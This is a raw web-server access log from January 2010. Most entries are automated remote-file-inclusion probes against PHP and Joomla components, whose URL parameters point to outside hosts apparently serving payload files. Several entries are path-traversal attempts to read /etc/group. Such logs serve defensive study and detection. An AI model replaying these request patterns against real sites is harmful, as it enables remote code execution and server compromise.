211.115.213.195 - - [05/Jan/2010:02:20:22 -0500] "GET /logs/access_log.Q109091800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:02:20:22 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:02:20:22 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:02:21:04 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:02:22:13 -0500] "GET /logs/access_log.Q109111800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:02:22:13 -0500] "GET /logs/access_log.Q109051500//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:02:22:40 -0500] "GET /images/Office%20Supply/top_of_page.gif HTTP/1.1" 200 236 "-" "Googlebot-Image/1.0"
216.117.143.180 - - [05/Jan/2010:02:22:54 -0500] "GET /logs/access_log.Q109072600/index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.117.143.180 - - [05/Jan/2010:02:22:54 -0500] "GET /index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.117.143.180 - - [05/Jan/2010:02:22:54 -0500] "GET /logs/index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.117.143.180 - - [05/Jan/2010:02:22:55 -0500] "GET /logs/index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
216.117.143.180 - - [05/Jan/2010:02:22:55 -0500] "GET /logs/access_log.Q109072600/index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.117.143.180 - - [05/Jan/2010:02:22:55 -0500] "GET /index.php?page=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET /logs/access_log.Q109081600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:23:09 -0500] "GET /logs/access_log.Q109081600//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:02:23:20 -0500] "GET /logs/error_log.Q109062600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [05/Jan/2010:02:24:03 -0500] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:02:24:19 -0500] "GET /logs/error_log.Q109120100//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.53.110.2 - - [05/Jan/2010:02:24:56 -0500] "GET /logs/error_log.Q109112500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:24:56 -0500] "GET /logs/error_log.Q109112500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:24:57 -0500] "GET /logs/error_log.Q109112600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 259 "-" "-"
74.53.110.2 - - [05/Jan/2010:02:24:57 -0500] "GET /logs/error_log.Q109112600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 259 "-" "-"
210.205.6.233 - - [05/Jan/2010:02:25:48 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:25:48 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:25:49 -0500] "GET /logs/error_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:25:50 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:25:50 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:02:25:50 -0500] "GET /logs/error_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:02:24:53 -0500] "GET /logs/access_log.Q109110400 HTTP/1.0" 200 5538748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.114.54 - - [05/Jan/2010:02:26:02 -0500] "GET /scripts/browser_ns6.js HTTP/1.0" 200 8373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.155.61.14 - - [05/Jan/2010:02:28:56 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
202.155.61.14 - - [05/Jan/2010:02:28:56 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
188.93.208.12 - - [05/Jan/2010:02:29:19 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:29:20 -0500] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:29:20 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:29:23 -0500] "GET /logs/access_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:02:31:06 -0500] "GET /logs/error_log.Q109121300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
222.122.157.111 - - [05/Jan/2010:02:32:00 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:32:00 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:32:00 -0500] "GET /logs/access_log.Q109071700%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:32:27 -0500] "GET /logs/access_log.Q109062100%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:34:28 -0500] "GET /logs/access_log.Q109071700/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:34:28 -0500] "GET /logs/access_log.Q109101600/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 291 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:36:07 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.38.64.117 - - [05/Jan/2010:02:36:08 -0500] "GET /logs/access_log.Q109061400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:02:36:08 -0500] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:02:36:08 -0500] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:02:36:08 -0500] "GET /logs/access_log.Q109120500//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.834"
200.93.147.154 - - [05/Jan/2010:02:36:20 -0500] "GET /logs/error_log.Q109120100//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:02:36:27 -0500] "GET /logs/access_log.Q109082200 HTTP/1.0" 200 2103181 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.126.18.58 - - [05/Jan/2010:02:38:44 -0500] "GET //include/admin.lib.inc.php?site_path=http://pnjambi.com/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.833"
75.126.18.58 - - [05/Jan/2010:02:38:44 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://pnjambi.com/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.833"
95.108.128.242 - - [05/Jan/2010:02:38:52 -0500] "GET /logs/error_log.Q109052900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
70.38.64.117 - - [05/Jan/2010:02:39:22 -0500] "GET /logs/access_log.Q109061400%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.834"
70.38.64.117 - - [05/Jan/2010:02:39:22 -0500] "GET /logs/access_log.Q109121300%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.professores.uff.br/wmrezende/images/id/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.834"
188.93.208.12 - - [05/Jan/2010:02:39:25 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:39:25 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:39:26 -0500] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:02:39:40 -0500] "GET /scripts/browser_konq.js HTTP/1.0" 200 6887 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.157.111 - - [05/Jan/2010:02:39:59 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:39:59 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:39:59 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:40:07 -0500] "GET /logs/access_log.Q109070700%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:40:07 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:40:07 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:40:07 -0500] "GET /logs/access_log.Q109071900%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:02:40:13 -0500] "GET /logs/access_log.Q109083100%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.ferieispania.no/calendar/events/1.gif?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:41:19 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
188.93.208.12 - - [05/Jan/2010:02:42:02 -0500] "GET /logs/access_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:42:02 -0500] "GET /logs/access_log.Q109072800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:42:02 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
188.93.208.12 - - [05/Jan/2010:02:42:02 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.camoplast.com/pdf/1.gif? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.172.33.230 - - [05/Jan/2010:02:42:24 -0500] "GET //rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
209.172.33.230 - - [05/Jan/2010:02:42:24 -0500] "GET /logs//rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
209.172.33.230 - - [05/Jan/2010:02:42:24 -0500] "GET /logs/access_log.Q109080100%20%20//rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
95.168.183.134 - - [05/Jan/2010:02:44:24 -0500] "GET //rss.php?site=http127001wagora&bn=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
95.168.183.134 - - [05/Jan/2010:02:44:24 -0500] "GET /logs//rss.php?site=http127001wagora&bn=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
95.168.183.134 - - [05/Jan/2010:02:44:24 -0500] "GET /logs/access_log.Q109080100%20%20//rss.php?site=http127001wagora&bn=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:39 -0500] "GET /logs/access_log.Q109091700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:39 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:39 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:39 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:40 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:41 -0500] "GET /logs/access_log.Q109091700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:41 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:02:44:41 -0500] "GET /logs/access_log.Q109070700%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
220.181.7.57 - - [05/Jan/2010:02:45:15 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.172.33.230 - - [05/Jan/2010:02:45:21 -0500] "GET /logs/access_log.Q109080100//rss.php?site=http127001wagora&bn=http://www.westchesterinvisalign.com/bash/baner.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:46:15 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.31.228.47 - - [05/Jan/2010:02:46:19 -0500] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
189.31.228.47 - - [05/Jan/2010:02:46:19 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
189.31.228.47 - - [05/Jan/2010:02:46:20 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.813"
95.108.128.242 - - [05/Jan/2010:02:46:38 -0500] "GET /logs/access_log.Q109112200 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
189.31.228.47 - - [05/Jan/2010:02:46:46 -0500] "GET /logs/access_log.Q109111000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
123.125.66.83 - - [05/Jan/2010:02:46:47 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
189.31.228.47 - - [05/Jan/2010:02:47:11 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
115.68.3.94 - - [05/Jan/2010:02:48:05 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:48:05 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:48:05 -0500] "GET /logs/access_log.Q109073100//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:02:50:46 -0500] "GET /logs/access_log.Q109051800//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
95.168.183.134 - - [05/Jan/2010:02:51:13 -0500] "GET /logs/access_log.Q109080100//rss.php?site=http127001wagora&bn=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:02:51:15 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET /logs/access_log.Q109112900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET /logs/access_log.Q109112900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:51:54 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:52:45 -0500] "GET /logs/access_log.Q109062700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:02:52:46 -0500] "GET /logs/access_log.Q109062700%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:02:53:57 -0500] "GET /images/Office%20Supply/login_curve.gif HTTP/1.1" 200 107 "-" "Googlebot-Image/1.0"
95.108.128.242 - - [05/Jan/2010:02:54:24 -0500] "GET /logs/error_log.Q109102300 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
72.22.197.240 - - [05/Jan/2010:02:54:58 -0500] "GET /logs/access_log.Q109111800%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:02:54:58 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:02:54:58 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
189.31.228.47 - - [05/Jan/2010:02:55:08 -0500] "GET /logs/access_log.Q109062300//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
189.31.228.47 - - [05/Jan/2010:02:55:09 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 224 "-" "libwww-perl/5.813"
189.31.228.47 - - [05/Jan/2010:02:55:09 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.813"
189.31.228.47 - - [05/Jan/2010:02:55:51 -0500] "GET /logs/access_log.Q109111000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://189.73.92.40/.ajim/idx.txt? HTTP/1.1" 404 251 "-" "libwww-perl/5.813"
209.59.12.99 - - [05/Jan/2010:02:56:20 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.104.130 - - [05/Jan/2010:02:57:04 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:57:04 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:02:57:04 -0500] "GET /logs/access_log.Q109082000%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
